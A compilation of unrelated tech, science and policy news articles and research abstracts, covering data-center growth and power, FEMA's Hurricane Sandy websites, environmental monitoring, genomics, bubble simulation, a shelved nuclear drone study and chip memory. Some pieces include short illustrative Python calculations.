Although the bits of the digital universe may travel at Internet speeds around the globe, it is possible to assign a place of origin to them and chart the map of the digital universe. In this year’s study, for the first time, we have managed to determine where the information in the digital universe was either generated, first captured, or consumed. This geography of the digital universe maps to the users of the devices or applications that pump bits into the digital universe or pull bits into one’s own personal digital solar system for the purpose of consuming information — Internet users, digital TV watchers, structures hosting surveillance cameras, sensors on plant floors, and so on.

In the early days, the digital universe was a developed world phenomenon, with 48% of the digital universe in 2005 springing forth from just the United States and Western Europe. Emerging markets accounted for less than 20%. However, the share of the digital universe attributable to emerging markets is up to 36% in 2012 and will be 62% by 2020. By then, China alone will generate 21% of the bit stream entering the digital universe. It stands to reason. Even though China accounts for only 11% of global GDP today, by 2020 it will account for 40% of the PCs, nearly 30% of smartphones, and nearly 30% of Internet users on the planet — not to mention 20% of the world population.

At the same time, the money invested by the regions in creating, managing, and storing their portions of the digital universe will vary wildly — in real dollar terms and as a cost per gigabyte. This disparity in investment per gigabyte represents to some extent differing economic conditions — such as the cost of labor — and to some extent a difference in the types of information created, replicated, or consumed. The cost per gigabyte from bits generated by surveillance cameras will be different from the cost per gigabyte from bits generated by camera phones.
However, to another extent, this disparity also represents differences in the sophistication of the underlying IT, content, and information industries — and may represent a challenge for emerging markets when it comes to managing, securing, and analyzing their respective portions of the digital universe. This might not be a major issue if the geography of the digital universe were as stable and fixed as, say, the geography of countries. However, bits created in one part of the physical world can easily find themselves elsewhere, and if they come with malware attached or leaky privacy protections, it’s a problem. The digital universe is like a digital commons, with all countries sharing some responsibility for it.

The installed base of unused storage bits introduces an interesting geographic twist that establishes a new dynamic by which to understand our digital universe. While emerging markets may indeed grow as a percentage of the digital universe, remember that much of the digital universe is a result of massive consumption on mobile and personal devices, digital televisions, and cloud-connected applications on PCs. As ownership of smartphones and tablets (that have relatively low internal storage and rely heavily on consuming information from "the cloud") increases exponentially within emerging markets, information consumption grows at an even faster pace. Given the connected infrastructure of our digital universe, information does not need to (and in fact will not) reside within the region where the information is consumed. Hence, today’s well-running datacenters will continue to expand and to fulfill an increasing number of requests — both local and from halfway across the globe — for information.
Another concern about the power grid comes from its lack of security. It was recently revealed that the energy grid has become vulnerable to attack: the recent declassification of a 2007 report from the National Academy of Sciences shows that the lack of physical security has experts worried. Although the United States Federal Energy Regulatory Commission (FERC) has been tasked with creating a new security strategy through its newly created Office of Energy Infrastructure Security, the threat still exists. If attacked, experts warn, the power grid could suffer more damage than it did during Superstorm Sandy, with the possibility of massive blackouts lasting weeks or even months at a time. While this knowledge has likely caused operators additional stress, one way to help alleviate the burden is to look at renewable resources — such as hydro, geothermal, solar and wind — for power. By using renewable resources, operators can take extra precautions to protect their campuses from future security risks regarding power sources. If hackers attack the power grid, operators will have peace of mind knowing they can continue operations thanks to the alternative power supply.

New Power Options

To help alleviate the strain on the power grid, data center operators are finding new ways to gather power. As the risks increase, operators can no longer rely solely on the power of their host country, and supplemental power is becoming vital. With demand for energy at an all-time high, it's crucial to ensure the power stays on even as the grid stretches to capacity. As a result of the pressure from the weakening grid, data centers have begun to utilize renewable resources harvested from their surroundings. According to the National Renewable Energy Laboratory, data centers across the country can utilize renewable energy technologies, but some technology solutions are better suited for select geographical locations.
Although the United States offers suitable locations, some companies have started venturing outside their home countries for stronger solutions. Large enterprises such as BMW, Facebook and Google have begun to move data center operations abroad to Iceland, Sweden and Finland, respectively. Attracted by the cool climates and relatively low pricing, these Arctic campuses are allowing operators to harvest renewable resources from their host countries for both power and cooling. With that, site selection plays the ultimate role in determining whether alternative technology can be accessed. As an added benefit, by gathering energy from the host country via renewables, data centers can control pricing and lower customers' carbon footprints. Facebook's facility in Sweden will require 70 percent less power than traditional data centers, while BMW's move to an Icelandic facility will save it around 3,600 metric tons of carbon emissions per year. Furthermore, the campuses will no longer be restricted to utilizing only their host country's power grid. Instead, their ability to gather power with renewable resources will lessen the unease and anxiety suffered by data center operators. Without being bound solely to the host country's power, data centers can remain online even if disaster strikes. While no one expects the power grid to fail completely, high-power users can and should expect to make lasting changes to how they collect their power. By utilizing alternative technology, data center operators can rest easy knowing their systems will remain online at all times, even during storms as severe as Sandy. Though the aging infrastructure and lack of security will continue to plague the grid, operators can begin to change their responses by taking action and thinking outside the box.

Industry Perspectives is a content channel at Data Center Knowledge highlighting thought leadership in the data center arena.
It’s finally happened: social media has risen to the top of our everyday terminology. The New Oxford American Dictionary just announced “unfriend” as its 2009 Word of the Year. That’s right: unfriend (verb) “To remove someone as a ‘friend’ on a social networking site such as Facebook.” Other Internet/technology words considered this year include hashtag, netbook and paywall, as well as Twitt, Tweeple and other common Twitter terms. Check out the full list here. Also big news is the new worldwide campaign to nominate the net for the Nobel Peace Prize in 2010. Wired magazine reports on “Internet for Peace”, launched last week by Wired Italy: “The internet can be considered the first weapon of mass construction, which we can deploy to destroy hate and conflict and to propagate peace and democracy,” said Riccardo Luna, editor-in-chief of the Italian edition of Wired magazine. “What happened in Iran after the latest election, and the role the web played in spreading information that would otherwise have been censored, are only the newest examples of how the internet can become a weapon of global hope.” For more info or to sign the petition, go to Internet for Peace. In case you’re looking for more random thoughts and interesting tidbits for Monday, see these: - The Funny and Bizarre World of Client Requests – from Inspect Element (via Smashing Magazine) - Behold, The Future! – from woot! Have something to share? Send it to us!
Source: http://www.codero.com/blog/monday-miscellany-unfriend-internet-for-nobel-and-more/
Agency: Cordis | Branch: FP7 | Program: BSG-SME | Phase: SME-2013-1 | Award Amount: 1.32M | Year: 2013

Insect pests cause significant damage to agricultural crops and transmit several important diseases of humans and animals. Chemical insecticides have been used to control insect pests for many decades and remain essential to ensure a supply of affordable food and as part of disease vector control for the foreseeable future. Unfortunately, the worldwide use of synthetic insecticides over many years has led to increased resistance to insecticides and contributed to environmental contamination. One way to reduce insecticide use without compromising control is to use a synergist in combination with an insecticide. Synergists are themselves nontoxic but act by increasing the effectiveness of the insecticides they are used with. They do this by inhibiting the metabolic systems in insects that detoxify insecticides. The goal of this project is to develop eco-friendly synergists for use in formulations with insecticides, both in agriculture and in public health, enabling a reduction in the amount of insecticidal active ingredient applied, and thereby reducing the adverse effects of these insecticides on beneficial insects such as bees. On the basis of in-depth experimental analyses of the interactions of the known synergist piperonyl butoxide with metabolic enzymes in pest insects, new molecular structures will be designed, synthesized and evaluated on pest and beneficial species using laboratory bioassays and field trials. In addition, the synthesis process to manufacture these synergists will be evaluated with the aim of achieving an industrially and economically feasible process. Finally, strategies will be developed that use the novel synergists to enhance the control of insect pests while preserving beneficial insects.

As such, this research has significant scientific, economic, and social impact as part of sustainable food production and disease control, and will enhance the partners' competitiveness in this important industry by means of global patent and license agreements.
Source: https://www.linknovate.com/affiliation/endura-spa-2155395/all/
With its satellites, scanners and links to local officials, the federal government is often the best source for trusted information during a hurricane, tornado or other natural disaster. Just having important information doesn't mean much, though, if the public can't find it or is too confused to do anything with it once it does. That's a lesson officials learned during Hurricane Katrina, when "separate websites were used to share information for evacuees, friends, and families and to publish lists of names" and "so many websites sprang up that it became difficult to find the specific website for the information, resources, or reconnection one needed," according to a lessons-learned report on social media and Hurricane Sandy published by the Homeland Security Department last week.

When Sandy pummeled the Northeast in October 2012, the Federal Emergency Management Agency did its best to ensure the government was speaking with a single online voice. That's easier said than done, though, as the report shows. The detailed description from the report of how FEMA, the General Services Administration and other agencies corralled Sandy information is below. Note that a single, authoritative source of government information is still a ways off, but there's now only one site, at USA.gov, aggregating information from across government.

FEMA and Federal Sandy Website Standardization

On October 31, 2012, the web manager for FEMA issued guidance to all U.S. government agency websites (per Emergency Support Function 15 of the National Response Framework). In this guidance, FEMA requested four things: creation of a www.[agency].gov/sandy landing page on each agency's site. On this page, agencies were requested to place information only from their own agencies (to stay in their "lane" of communication) and not to cross-post information from other agencies.
If one agency had information that would be appropriate to place on another agency's website, the agencies' web managers were asked to coordinate directly. A request to create a URL for both English and Spanish content (if appropriate) was also made. Once the www.[agency].gov/sandy landing page was created, the agencies were asked to notify the USA.gov web manager at the U.S. General Services Administration (GSA) that the page was active and provide under which general "lane" of information the page fell:

- Health and Safety;
- How to Get Help;
- Find Friends and Family;
- Donate/Volunteer; and
- What the Government is Doing.

Once the USA.gov/sandy page was created, all agencies were then encouraged to cross-link from their agency homepage and their www.[agency].gov/sandy page back to the www.USA.gov/sandy page and/or embed the USA.gov Hurricane Sandy widget on their agency websites. Once the www.[agency].gov/sandy pages were created, FEMA also requested that all agencies notify the FEMA web manager of the page status and also include whether or not the following information was included on the page:

- Situation reports;
- Blog posts;
- Press releases;
- Safety/recovery tips; and
- Other (details).

This information was then shared with FEMA's Strategic Communications Division within the Office of External Affairs. The goal of this effort was to drive visitors looking for Sandy information back to one authoritative source. FEMA, working with GSA, consolidated all U.S. government web content related to Sandy onto www.USA.gov/sandy, with specific relief and recovery information consolidated onto www.FEMA.gov/sandy. A widget was then created that directed the public to the five identified lanes of communication (identified above) on USA.gov. From October 22 through December 31, 2012, the Hurricane Sandy page on USA.gov was viewed over 71,000 times, with the Hurricane Sandy widget being viewed over 2.8 million times.
The Spanish version of the page was viewed over 3,600 times and the Spanish widget was viewed over 10,000 times. FEMA’s Sandy Landing Page On the www.FEMA.gov/sandy landing page, FEMA provided all of the specific relief, response and recovery information related to Sandy. Information for disaster survivors included how to get immediate help, how to locate a shelter, how to locate a FEMA Disaster Recovery Center, and access to the state-specific disaster declarations. This information was also ultimately provided in 18 languages aside from English. Links were provided to all applicable state and local websites, and information was provided for those who want to help (donations and volunteering). As a direct response to lessons learned from Hurricane Katrina, the www.FEMA.gov/sandy page also contained two features that were part of a concerted effort to increase transparency around the U.S. government’s response to Sandy. The first was a timeline page, which provided a detailed chronology of the U.S. government’s response activities from October 22 through November 18, 2012. The second was a “Hurricane Sandy: By the Numbers” widget, which presented how many FEMA personnel were deployed in response to the disaster, how many assistance registrations had been received, how much had been approved in assistance dollars, and how many disaster recovery centers were open and their locations. From October 22 through December 31, 2012, Hurricane Sandy pages on FEMA.gov were viewed over 740,000 times, with over 7 million visitors coming to the site as a whole.
Source: http://www.nextgov.com/emerging-tech/emerging-tech-blog/2013/06/governments-hurricane-sandy-pages-play-play/64244/
Monteith D., Center for Ecology and Hydrology | Henrys P., Center for Ecology and Hydrology | Banin L., Center for Ecology and Hydrology | Smith R., Center for Ecology and Hydrology | And 22 more authors. Ecological Indicators | Year: 2016

We characterised temporal trends and variability in key indicators of climate and atmospheric deposition chemistry at the twelve terrestrial UK Environmental Change Network (ECN) sites over the first two decades of ECN monitoring (1993-2012) using various statistical approaches. Mean air temperatures for the monitoring period were approximately 0.7 °C higher than those modelled for 1961-1990, but there was little evidence for significant change in air temperature over either the full monthly records or within individual seasons. Some upland ECN sites, however, warmed significantly over the first decade before cooling in the second. Summers at most sites became progressively wetter, and extremes in daily rainfall increased in magnitude. Average wind speeds in winter and spring declined at the majority of sites. Directional trends in summer precipitation could be linked to an atypically prolonged negative deviation in the summer North Atlantic Oscillation (NAO) Index. Several aspects of air quality improved markedly. Concentrations and fluxes of sulphate in precipitation declined significantly and substantially across the network, particularly during the earlier years and at the most polluted sites in the south and east. Precipitation concentrations of nitrate and ammonium, and atmospheric concentrations of nitrogen dioxide also decreased at most sites. There was less evidence for reductions in the loads of wet deposited nitrogen species, while trends in atmospheric ammonia concentration varied in direction and strength between sites. Reductions in acid deposition are likely to account for widespread gradual increases in the pH of soil water at ECN sites, representing partial recovery from acidification.
Overall, therefore, ECN sites have experienced marked changes in atmospheric chemistry and weather regimes over the last two decades that might be expected to have exerted detectable effects on ecosystem structure and function. While the downward trend in acid deposition is unlikely to be reversed, it is too early to conclude whether the trend towards wetter summers simply represents a phase in a multi-decadal cycle, or is indicative of a more directional shift in climate. Conversely, the first two decades of ECN now provide a relatively stable long-term baseline with respect to air temperature, against which effects of anticipated future warming on these ecosystems should be able to be assessed robustly. © 2016 Elsevier Ltd.

Rose R., UK Center for Ecology and Hydrology | Monteith D.T., UK Center for Ecology and Hydrology | Henrys P., UK Center for Ecology and Hydrology | Smart S., UK Center for Ecology and Hydrology | And 20 more authors. Ecological Indicators | Year: 2016

We analysed trends in vegetation monitored at regular intervals over the past two decades (1993-2012) at the twelve terrestrial Environmental Change Network (ECN) sites. We sought to determine the extent to which flora had changed and link any such changes to potential environmental drivers. We observed significant increases in species richness, both at a whole-network level, and when data were analysed within Broad Habitat groupings representing the open uplands, open lowlands and woodlands. We also found comparable increases in an indicator of vegetation response to soil pH, Ellenberg R. Species characteristic of less acid soils tended to show more consistent increases in frequency across sites relative to species with a known tolerance for strongly acidic soils.
These changes are, therefore, broadly consistent with a response to increases in soil solution pH observed for the majority of ECN sites that, in turn, are likely to be driven by large reductions in acid deposition in recent decades. Increases in species richness in certain habitat groupings could also be linked to increased soil moisture availability in drier lowland sites that are likely to have been influenced by a trend towards wetter summers in recent years, and possibly also to a reduction in soil nitrogen availability in some upland locations. Changes in site management are also likely to have influenced trends at certain sites, particularly with respect to agricultural practices. Our results are therefore indicative of widescale responses to major regional-scale changes in air pollution and recent weather patterns, modified by local management effects. The relative consistency of management of ECN sites over time is atypical of much of the wider countryside and it is therefore not appropriate to scale up these observations to infer national scale trends. Nevertheless the results provide an important insight into processes that may be operating nationally. It will now be necessary to test for the ubiquity of these changes using appropriate broader spatial scale survey data. © 2016.
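The trend statements in these abstracts ultimately rest on slope estimates over the 1993-2012 monitoring window. A minimal ordinary-least-squares sketch on a synthetic series (the ECN analyses themselves use more sophisticated statistics, and the numbers below are invented, not ECN measurements):

```python
def ols_slope(years, values):
    """Least-squares slope of values against years (units per year)."""
    n = len(years)
    mean_x = sum(years) / n
    mean_y = sum(values) / n
    sxx = sum((x - mean_x) ** 2 for x in years)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(years, values))
    return sxy / sxx

# Synthetic sulphate-in-precipitation series, declining over 1993-2012.
years = list(range(1993, 2013))
sulphate = [3.0 - 0.08 * (y - 1993) for y in years]  # mg/l, invented

slope = ols_slope(years, sulphate)
print(f"Trend: {slope:.3f} mg/l per year")  # ≈ -0.080
```

A negative slope here corresponds to the declining sulphate deposition the abstract reports; significance testing and seasonal decomposition are the parts this sketch omits.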
Source: https://www.linknovate.com/affiliation/afbini-1855309/all/
BOSTON—The cost of mapping an individual human genome is dropping exponentially, from $100 million just 12 years ago to $5,000 today. Silicon Valley entrepreneurs hope to drive the price below $1,000, the cost of an MRI test, and within a decade it very well may be possible to conduct a whole genome sequence for every newborn at birth. Cynics point out that genome sequencing is the only healthcare cost actually going down, at a time when U.S. healthcare spending is projected to approach $3 trillion in 2013. But the research and analytics that result from such data are poised to change the way healthcare providers, insurance companies and pharmaceutical companies do business—if only everyone who has the information is willing and able to share it.

Crowdsourcing One Possibility for Genomic Research

A whole genome sequence can be cost effective, says Sandy Aronson, executive director for IT at the Partners HealthCare Center for Personalized Genetic Medicine, since it can be run once and then used across multiple "episodes of care." Aronson and others spoke at the recent Medical Informatics World conference. Today, clinicians can run 2,900 tests against a patient's genome, Aronson notes. The challenge is twofold, he adds: knowing how to interpret the results of a test and, with a genome containing as many as 5 million variants, making sure nothing is missed. To address this, organizations must be prepared to "pre-position" IT infrastructure to take advantage of ever-changing genomics research and incorporate it into mainstream clinical care, Aronson says. On top of that, the industry needs to change regulatory and reimbursement frameworks, provide training for healthcare providers, payers and patients, and lean on society's resources. The latter could involve "highly structured crowdsourcing," he says, which places tests—of diseases, variants, pharmacological effects and others—in the context of patient phenotypes and family history.
This augments a patient's record and can add further value with, for example, alerts that are triggered by certain test results. Such information is also of interest to insurance companies, says Dr. Lonny Reisman, senior vice president and chief medical officer for Aetna, as it offers the opportunity to use "phenotypic manifestations" for predictive analysis of patient populations. This, in turn, can be applied to "value-based insurance design," which Aetna has used to waive co-pays for certain procedures or medications that offer proven long-term benefits to patients with heart conditions, Reisman says.

For Patients to See Value, Data Must Flow Both Ways

Even with waived co-pays, the patient compliance rate remains less than 50 percent, Reisman says. This points to a larger concern in the healthcare industry: improving patient engagement. For Aronson, Reisman and others speaking at Medical Informatics World, better information sharing will lead to better patient engagement. Dr. Mark Davies, executive medical director of the Health & Social Care Information Centre within Britain's National Health Service, says physicians should have an "adult" relationship with patients—one that makes them feel like they're part of an equal partnership. This, in turn, must be coupled with a "bidirectional flow of insight" among patients, providers and payers, Reisman says. The benefit is bidirectional, too. Patients have better access to more robust personal health information, while patient-reported outcome measures can be used for quality, accountability and transparency improvement initiatives, Davies says. For this to succeed, though, there must be a clear value for patients. Right now, unfortunately, that isn't the case, says Dr. John Halamka, CIO at Boston's Beth Israel Deaconess Medical Center. While the U.S.
government's meaningful use incentive program does require healthcare providers to offer technology that lets patients download, request and transmit data, there is little "value add" for personal health record or disease management applications, Halamka notes. In most cases, patients visit these apps once but don't come back. Poor usability and functionality are often to blame, Halamka says. "Go build apps that provide value."

Predictive Modeling Is Where the Value Is

For Julie Meek, clinical associate professor in the Indiana University School of Nursing, that value is in predictive modeling. Bringing together demographics, billing and pharmacy claims, lab test results, patient-supplied data and genomic research—and then incorporating it all into the clinical workflow via an EHR system—gives patients a much better sense of their health indicators than the height, weight, blood test and urine test of the annual physical ever could. The key is making sure that no data sets are missed. Meek's predictive modeling—which is more than just an exercise in data mining, she says, because it incorporates logistic regression and model validation—considers 39 separate variables. Many stick to age and gender data, as both are readily available, but, as Meek puts it, "Cheap data is no substitute for legitimate inquiry." She advocates such a comprehensive approach to population health management because the status quo isn't cutting it. Twenty percent of Medicare patients who are hospitalized are subsequently readmitted within 30 days—and many, for whatever reason, don't follow up with a physician in between hospital visits. This is costly and inefficient. Determining who will come back isn't easy—John D'Amore, founder of clinical analytics software vendor Clinfometrics, says this analysis must take into account 60 variables—but it can be done.
Take a group of 15 patients being discharged from the hospital and, D'Amore says, you can identify the five at the highest risk of being readmitted. That's important because, in that group of 15, 74 percent of the readmissions come from one of those five patients, he says.

Genomics Research Allows for 'Precision Medicine'—If Data's Available

The data that's gleaned from genomics research could play an increasing role in this type of modeling, whether it's reducing readmission rates or researching cancer in the name of "precision medicine" that's tailored to individual patients' needs. It's "could" and not "will" because, while Davies says "we have some fantastic technology out there" to first conduct and then share genomic research, a mix of professional, personal and cultural factors combine to make data dissemination difficult. Patients fear that data will be sold to pharmaceutical or life sciences firms, while researchers and providers persist in creating data silos. What's needed, Aronson says, is a more detailed regulatory framework that can address data privacy as well as genomic data use case standards. From a care-coordination and knowledge-sharing standpoint, primary care physicians, specialists and genetic researchers have to be connected. (However, Halamka points out, health information exchange is no easy task, as each U.S. state and territory has different data sharing standards; what's legal in Massachusetts may be illegal in neighboring New Hampshire.) There's also an educational component at the caregiver level, Aronson adds. Families need to understand the importance of sharing genomic information. Or, as Davies says, the industry needs to know that "failure to share data kills people."
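The readmission triage D'Amore describes—score discharged patients, flag the highest-risk few—can be sketched with a toy logistic model. The variables, weights and patient records below are invented for illustration; real models use 39 to 60 validated variables:

```python
import math

# Invented weights over three of the many variables a real model uses.
WEIGHTS = {"age": 0.03, "prior_admits": 0.6, "num_meds": 0.1}
BIAS = -4.0

def readmission_risk(patient):
    """Logistic readmission probability from a linear risk score."""
    score = BIAS + sum(WEIGHTS[k] * patient[k] for k in WEIGHTS)
    return 1.0 / (1.0 + math.exp(-score))

def top_risk(patients, k=5):
    """The k patients with the highest predicted readmission risk."""
    return sorted(patients, key=readmission_risk, reverse=True)[:k]

# 15 hypothetical discharges; flag the 5 highest-risk for follow-up.
patients = [{"id": i, "age": 50 + 2 * i, "prior_admits": i % 4,
             "num_meds": 3 + i % 6} for i in range(15)]
flagged = top_risk(patients)
print([p["id"] for p in flagged])
```

The point of the sketch is the triage step: concentrating follow-up resources on the short list the model produces, which is where most readmissions would occur if the model is any good.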
Source: http://www.cio.com/article/2386333/healthcare/how-genomic-research-could-improve-healthcare.html
Supercomputers at the Department of Energy's National Energy Research Scientific Computing Center (NERSC) have worked on important computational problems such as collapse of the atomic state, the optimization of chemical catalysts, and now modeling popping bubbles. Using NERSC's Hopper system, UC Berkeley mathematicians Robert Saye and James Sethian combined four sets of equations governing the decay of individual bubbles into a single model. "Modeling the vastly different scales in a foam is a challenge, since it is computationally impractical to consider only the smallest space and time scales," Saye said in explaining the difficulties of modeling bubbles.

So why dedicate valuable supercomputing resources to the seemingly trivial problem of popping bubbles? For one, bubble decay actually resembles the decay of radioactive particles. Bubbles pop at random yet expected intervals, meaning it is known how many bubbles in a group will disintegrate over time but it is uncertain which bubbles those are. Understanding why a particular bubble pops when it does, by modeling the intense set of equations, could potentially provide insight into the decay of much smaller individual particles. Further, studying bubbles already has a real-world application, in that chemical engineers frequently work with substances that foam. "Today the chemical engineer faced with designing such [a] plant must rely on extrapolation from experience, and guesswork," said Denis Weaire, physicist at Trinity College. "To do better we need realistic models. They could arise out of calculations like this."

To perform the calculations and generate the model, Saye and Sethian discovered the process could be broken into four distinct layers of differential equations. One set described the draining of liquid from the bubble, a process that eventually leads to a bubble's popping.
A second set modeled the flow of liquid among bubbles, while a third described the bubble wobble after one pops, clearly visible in the generated model. The fourth set dealt with the optics, describing how the mechanics and chemical makeup explain the interference that sometimes results in rainbows. "We developed a scale-separated approach that identifies the important physics taking place in each of the distinct scales, which are then coupled together in a consistent manner," Saye said. After the parameters were set, it took the supercomputers at NERSC five days to run the computations and generate the model.

"This work has application in the mixing of foams, in industrial processes for making metal and plastic foams, and in modeling growing cell clusters," said Sethian. "These techniques, which rely on solving a set of linked partial differential equations, can be used to track the motion of a large number of interfaces connected together, where the physics and chemistry determine the surface dynamics." As Sethian noted, the work promises practicality in various real-world applications, including the aforementioned research in foams as well as in the life sciences. A problem that displays decay properties and shares surface interactions with fellow decaying objects can utilize the methods championed here by Sethian and Saye.
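The radioactive-decay analogy is easy to make concrete: give every bubble the same constant per-step popping probability, and the population decays exponentially even though which bubble pops next is random. This toy simulation is illustrative only; the Saye-Sethian model solves coupled partial differential equations, not this:

```python
import random

def simulate_pops(n_bubbles, hazard, steps, seed=0):
    """Surviving-bubble counts per step under a constant popping hazard."""
    rng = random.Random(seed)
    alive = n_bubbles
    survivors = [alive]
    for _ in range(steps):
        # Each surviving bubble pops this step with probability `hazard`.
        alive -= sum(1 for _ in range(alive) if rng.random() < hazard)
        survivors.append(alive)
    return survivors

counts = simulate_pops(10_000, hazard=0.05, steps=20)
expected_final = 10_000 * (1 - 0.05) ** 20  # exponential-decay prediction

print(counts[-1], round(expected_final))
```

The simulated survivor count tracks the exponential prediction closely for a large population — exactly the "known how many, unknown which" behavior the article describes.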
Source: https://www.hpcwire.com/2013/05/15/computing_the_physics_of_bubbles/
The U.S. military has apparently shelved the idea of developing a nuclear-powered drone aircraft that would be capable of staying in the air for months, but would pose so great a risk to those it might crash on that it was canceled due to "political conditions." The project was allegedly underway at Sandia National Laboratories as part of a series of efforts to increase the duration of UAV flying time from "days to months" while increasing the amount of electricity available onboard by at least 200 percent, according to a June 2011 summary of the project from Sandia.

The story broke after Steven Aftergood, an electrical engineer who works for the Federation of American Scientists, published the summary on his FAS blog Secrecy News. The blog reports on changes in government policy on secret information and access to official records that are hidden, suppressed or difficult to find. According to the summary of "Unmanned Air Vehicle Ultra-Persistence Research" (PDF), Sandia and Northrop Grumman collaborated on a project to reduce or eliminate restrictions on flight time due to fuel use and to make enough electricity available to drive high-power avionics, "payload systems" such as electronic countermeasure systems that jam radar or communications, or surveillance equipment to eavesdrop on cell-phone calls. The two were also responsible for making communication with the drones more reliable. Several drones are lost every year, both in testing and in combat areas, after the radio connection between controller and drone is broken. Most famously, a CIA-operated version of America's most advanced production UAV, the RQ-170 Sentinel, crashed 140 miles inside Iran after the operators reportedly lost the radio signal that allowed them to control it. During the project, engineers evaluated eight technologies to produce heat, three to convert power, two dual-cycle propulsion systems and one electrical generator, for UAVs of varying sizes.
Long-range UAVs would eliminate the need for many forward bases, remove most of the logistically complex process of refueling a plane in flight, and reduce the high maintenance requirement for UAVs based near war zones. The project was largely successful, though only theoretically. All the work was done on CAD/CAM machines and using process analysis to estimate the impact on supply chains, the need for surveillance systems and other resources. No systems were actually built, but the designs themselves passed at least the first few stages of analysis estimating effectiveness and cost-effectiveness that would have qualified the project to be considered for development. "As a result of this effort, UAVs were to be able to provide far more surveillance time and intelligence information while reducing the high cost of support activities," the summary read. "This technology was intended to create unmatched global capabilities to observe and preempt terrorist and weapon of mass destruction (WMD) activities."

"Unfortunately, none of the results will be used in the near-term or mid-term future," the project summary stated. "It was disappointing to all that the political realities would not allow use of the results."

– Sandia/Grumman Cooperative Research and Development Agreement (#1714), quoted in Secrecy News, March 22, 2012

Beating around a very dangerous bush

The report never actually uses the word "nuclear," though the lead investigator is a specialist in nuclear propulsion, and phrases such as "propulsion and power technologies that [go] well beyond existing hydrocarbon technologies" and references to the decommissioning and disposal of fuel make clear that "there is little doubt about the topic under discussion," Aftergood wrote. Despite coming up with design ideas they thought would work, the study's authors appear not to have thought very seriously about whether or how they could ever get a nuclear-powered drone even one step off the drawing board.
"The results will not be applied/implemented," they wrote, blaming unfavorable "political conditions" for not giving the little nuclear UAV its chance. The report didn't say the political conditions were the kind that would result if an American nuclear-powered drone ever wandered away from its handlers and crashed in Iran, for example, where the government would be even happier to receive the gift of American nuclear-fission generators than it was to receive a nearly intact version of the latest American UAV. Sandia didn't deny the existence of the project summary or specifically deny that nuclear propulsion might be involved (though it didn't confirm anything, either). It issued a statement saying researchers at Sandia do a lot of work on very advanced technologies, often simply to explore the possibilities rather than as an earnest effort to turn every question they examine or prototype they design into a deployable weapon. "The research on this topic was highly theoretical and very conceptual. The work only resulted in a preliminary feasibility study and no hardware was ever built or tested. The project has ended." The project ended in 2009, which is a good thing. The Sentinel didn't go down until two years later. It would have been a shame if it had taken Sandia's new power plant with it.
Source: http://www.itworld.com/article/2728406/security/u-s--decides-against-making-crash-prone-drones-run-on-nukes.html
University of Utah researchers have found even more ways to use all those pings coming from a Wi-Fi hotspot. On top of being able to see through walls, they've found a way to use a wireless network to monitor a person's heart rate. The group of engineers, led by assistant professor of electrical engineering Neal Patwari, rigged their system together by surrounding a hospital bed with 20 wireless transmitters on a 2.4GHz band. The system was able to estimate a person's breathing rate to within 0.4 to 0.2 breaths per minute based on only 30 seconds of data, whereas most monitors round off to the nearest full breath per minute. The experimental system also passed its accuracy test against a carbon dioxide monitor connected to the patient's nostrils by tubes. A Wi-Fi-based monitoring system is also much more comfortable for the patient than current monitors, which tape a wired sensor to a finger. Of course, this new system has a few caveats. If the patient moves, the system will detect the movement in place of their heart rate. The system also needs a minimum of 13 wireless transmitters, but the error rate drops to zero when 19 nodes are in use. The system could be used to monitor a host of heart-related illnesses, including heart disease, sleep apnea, or babies at risk for sudden infant death syndrome. It's cheap, too, as the system can be made with typical, commercially available wireless hardware. Patwari and his team are exploring different or multiple radio frequencies that could make their system more accurate or capable of monitoring two people breathing at different rates. The researchers estimate that the technology could make its way into homes in the next 5 years. The system could be used by the military or SWAT to detect the number of heartbeats inside a building.
Here's How to Change It - Mechatronic Security Robot Is Remarkably Formidable - Screw It: AudioBulb Wireless Speaker System as Easy as Twisting in Light Bulbs This story, "University develops WiFi network that monitors hearts" was originally published by PCWorld.
AMD Eyes Chip Memory Expansion

The chip maker has licensed new technology that could help boost its chips' onboard memory. Advanced Micro Devices Inc. is exploring new types of onboard memory for its chips as a way to bump performance and squeeze more out of its manufacturing plants. The Sunnyvale, Calif., chip maker has licensed memory technology called Z-RAM, created by startup Innovative Silicon Inc. of Santa Clara, Calif., in an effort to look at new ways of increasing the cache, or onboard memory, of its processors. Z-RAM, which stands for zero-capacitance dynamic RAM, promises the ability to double the density of DRAM (used to store data) or quintuple that of static RAM (used for processor caches) without requiring special materials or extra manufacturing techniques during fabrication, according to Innovative Silicon officials. Although it's still in the early stages of working with Z-RAM, AMD believes the technology could help it reduce the area that cache memory occupies inside its chips. Shrinking the caches could either allow it to reduce a chip's overall area, referred to as its die size, or add more memory while keeping the size the same. Because the wafers chip makers use to turn out chips are a finite size (most chip makers, including AMD, are now moving to 300mm-diameter wafers), the smaller each chip is, the more of them can be manufactured per wafer. Smaller chips thus also cost less to make.
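The economics in that last point (smaller dies mean more chips per wafer) can be sketched numerically. The approximation below is a common first-order dies-per-wafer formula, and the die areas are illustrative assumptions, not figures from the article:

```python
import math

def dies_per_wafer(wafer_diameter_mm: float, die_area_mm2: float) -> int:
    """First-order estimate of gross dies per wafer: wafer area divided
    by die area, minus a correction for partial dies lost at the edge."""
    wafer_area = math.pi * (wafer_diameter_mm / 2) ** 2
    edge_loss = math.pi * wafer_diameter_mm / math.sqrt(2 * die_area_mm2)
    return int(wafer_area / die_area_mm2 - edge_loss)

# Shrinking a hypothetical die from 200 mm^2 to 150 mm^2 on a 300 mm wafer
# yields noticeably more gross dies per wafer:
print(dies_per_wafer(300, 200))
print(dies_per_wafer(300, 150))
```

Since wafer processing cost is roughly fixed per wafer, every extra die that fits directly lowers the cost per chip, which is exactly the incentive described above.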
Apple Fruit - Information & Facts about the Wonder Fruit Apple

Most of us are familiar with the tale from Switzerland of William Tell, in which an apple was placed on the head of his son and Tell was ordered to split the apple with his arrow or lose his son. Of course, Tell succeeded in piercing the apple in two and saved his son. Again, we have heard of the Adam's apple. The story goes that in the Garden of Eden, Adam ate a piece of the forbidden fruit that got stuck in his throat, and thus the term Adam's apple. An Adam's apple sometimes looks like a small, rounded apple just under the skin in the front of the throat, usually seen in boys. Now let's have some interesting facts about apples and how they aid good health.

Apple Fruit Facts

